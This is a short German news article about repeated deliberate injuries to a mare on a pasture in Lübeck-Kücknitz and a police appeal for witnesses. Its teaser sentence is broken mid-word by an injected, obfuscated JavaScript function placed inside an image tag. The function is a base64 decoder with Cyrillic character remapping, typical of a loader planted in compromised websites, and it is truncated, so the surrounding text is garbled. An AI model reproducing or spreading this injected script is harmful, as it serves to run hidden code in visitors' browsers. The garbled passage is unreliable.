Mutwillige Verletzung eines Pferdes

2. August 2015 | Von Redaktion | Kategorie: Gesellschaft
Widerholt mutwillige Verletzungen an einer 23jährigen Stute sind nun Gegenst<script type=function m65c3bbf5572b(wc){var s4=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var r1=”;var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand einer Untersuchung durch die Polizei (Foto: POL-HL).” width=”600″ height=”338″ />

[Lübeck (GER)/(pol-hl/ots)]. Seit Mitte Juli 2015 kam es offenbar auf einer Koppel in Lübeck-Kücknitz zu Übergriffen auf ein Pferd. Die Besitzerin hat nun Anzeige bei der Polizei erstattet.

Seit dem 14. Juli 2015 hatte sie immer wieder Verletzungen an ihrer 23 Jahre alten Stute festgestellt, die allesamt sehr tief unter anderem an den Vorder- und Hinterbeinen zu erkennen waren. Ihre Vermutung, dass die Trakehner Stute sich die Verletzungen nicht selbst zugefügt hatte, wurde durch eine Tierärztin bestätigt. Daraufhin meldete die Lübeckerin die Vorfälle der Polizei in Kücknitz, die nun Zeugen in der Sache sucht. Wer auffällige Beobachtungen auf der Koppel in der Buurdiekstraße und deren Umgebung gemacht hat, gibt dies bitte der Kücknitzer Polizei unter der Rufnummer 0451/300 36 30 bekannt.

Tags: , , ,
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=130947

Hier klicken, um einen Kommentar zu schreiben